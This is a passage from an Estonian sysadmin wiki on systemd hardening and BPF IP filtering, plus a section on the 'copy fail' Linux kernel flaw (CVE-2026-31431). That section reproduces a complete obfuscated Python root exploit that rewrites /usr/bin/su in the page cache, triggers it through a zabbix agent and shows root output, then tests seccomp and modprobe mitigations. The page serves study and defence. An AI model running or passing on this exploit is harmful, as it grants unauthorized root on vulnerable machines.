✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su'
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (arvuti mälu)

|
v

vfs (virtual file system) (arvuti mälu)

|
v

page cache (arvuti mälu)

|
v

ext4 filesystem (plokkseade)

|
v

plokkseade (füüsiline ese)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html